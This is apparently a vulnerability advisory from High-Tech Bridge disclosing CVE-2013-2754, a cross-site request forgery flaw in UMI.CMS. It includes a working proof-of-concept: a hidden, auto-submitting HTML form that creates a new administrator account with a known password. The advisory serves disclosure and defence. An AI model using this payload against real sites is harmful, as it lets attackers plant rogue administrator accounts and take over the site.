High-Tech Bridge Security Research Lab discovered CSRF vulnerability in UMI.CMS, which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and create new administrator in the vulnerable application.
- Cross-site Request Forgery (CSRF) in UMI.CMS: CVE-2013-2754
The application allows authorized administrator to perform certain sensitive actions via HTTP requests without making proper validity checks to verify the source of these HTTP requests. This can be exploited to perform any actions with administrator privileges, such as adding new administrator to the system.
A remote attacker can create a specially crafted webpage, trick a logged-in administrator to open it and create new user with administrative privileges.
A basic CSRF exploit below will create new administrator with “csrfuser” as a login and “password” as a password:
<form action=“http://[host]/admin/users/add/user/do/” method=“post” name=“main”>
<input type=“hidden” name=“data[new][login]” value=“csrfuser”>
<input type=“hidden” name=“data[new][password][]” value=“password”>
<input type=“hidden” name=“data[new][e-mail]” value="[email protected]">
<input type=“hidden” name=“data[new][is_activated]” value=“1”>
<input type=“hidden” name=“data[new][fname]” value=“username”>
<input type=“hidden” name=“data[new][groups][]” value=“1”>
<input type=“hidden” name=“data[new][groups][]” value=“2”>
<input type=“hidden” name=“” value=“”>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>